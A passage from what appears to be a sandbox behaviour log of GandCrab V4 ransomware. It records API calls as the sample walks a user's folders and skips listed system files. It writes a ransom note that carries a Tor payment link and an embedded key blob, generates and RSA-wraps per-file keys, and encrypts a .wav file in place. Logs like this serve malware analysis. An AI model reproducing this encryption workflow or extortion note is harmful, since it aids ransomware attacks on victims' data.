lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.249] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.249] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.249] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.249] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0093.249] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0093.249] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\d2ca4a08d2ca4dee3d.lock" [0093.249] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.249] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 80 [0093.249] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\d2ca4a08d2ca4dee3d.lock") returned 75 [0093.249] lstrlenW (lpString=".lock") returned 5 [0093.249] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.250] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0093.250] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.250] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.250] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.250] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0093.250] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0093.250] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\KRAB-DECRYPT.txt" [0093.250] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.251] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\KRAB-DECRYPT.txt.KRAB") returned 73 [0093.251] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\KRAB-DECRYPT.txt") returned 68 [0093.251] lstrlenW (lpString=".txt") returned 4 [0093.251] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.251] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0093.251] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.252] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\KRAB-DECRYPT.txt") returned 68 [0093.252] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\KRAB-DECRYPT.txt") returned 68 [0093.252] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.252] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.252] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0093.252] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.252] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.252] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.253] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0093.253] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0093.253] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0093.253] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0093.253] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.253] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.253] lstrcmpW (lpString1="rsRZea_AFWnVh9JT", lpString2=".") returned 1 [0093.253] lstrcmpW (lpString1="rsRZea_AFWnVh9JT", lpString2="..") returned 1 [0093.253] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\", lpString2="rsRZea_AFWnVh9JT" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT" [0093.253] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\" [0093.253] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.254] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.254] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.254] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.254] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.255] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.255] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.255] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\\\KRAB-DECRYPT.txt") returned 86 [0093.256] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\rsrzea_afwnvh9jt\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x734 [0093.268] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0093.268] WriteFile (in: hFile=0x734, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0093.269] CloseHandle (hObject=0x734) returned 1 [0093.269] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.269] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.270] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0x1d8)) [0093.270] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.270] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.270] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.271] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\d2ca4a08d2ca4dee3d.lock") returned 92 [0093.271] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\rsrzea_afwnvh9jt\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x734 [0093.271] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.271] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.272] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\") returned 69 [0093.272] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\*" [0093.272] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd620 [0093.272] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.272] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.272] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.273] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.273] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.273] lstrcmpW (lpString1="8Zaw0HvYd2tdk.wav", lpString2=".") returned 1 [0093.273] lstrcmpW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="..") returned 1 [0093.273] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\", lpString2="8Zaw0HvYd2tdk.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav" [0093.273] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.273] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav.KRAB") returned 91 [0093.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav") returned 86 [0093.273] lstrlenW (lpString=".wav") returned 4 [0093.273] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.274] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.274] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav") returned 86 [0093.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav") returned 86 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="desktop.ini") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="autorun.inf") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="ntuser.dat") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="iconcache.db") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="bootsect.bak") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="boot.ini") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="ntuser.dat.log") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="thumbs.db") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="ntldr") returned -1 [0093.274] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="NTDETECT.COM") returned -1 [0093.275] lstrcmpiW (lpString1="8Zaw0HvYd2tdk.wav", lpString2="Bootfont.bin") returned -1 [0093.275] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.275] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0093.275] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.276] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.276] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.276] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0093.276] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.276] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.276] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0093.277] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.278] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.278] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.278] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0093.278] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.278] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.278] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0093.281] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0093.281] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0093.281] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0093.281] GetLastError () returned 0x0 [0093.281] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0093.281] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.281] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010f08) returned 1 [0093.282] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0093.282] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0093.282] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0093.282] GetLastError () returned 0x0 [0093.282] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0093.282] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0093.282] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\rsrzea_afwnvh9jt\\8zaw0hvyd2tdk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0093.283] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.283] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.283] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xcf52, lpOverlapped=0x0) returned 1 [0093.294] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff30ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.294] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xcf52, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xcf52, lpOverlapped=0x0) returned 1 [0093.295] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0093.295] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.299] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.299] CloseHandle (hObject=0x43c) returned 1 [0093.299] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.300] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\rsrzea_afwnvh9jt\\8zaw0hvyd2tdk.wav"), 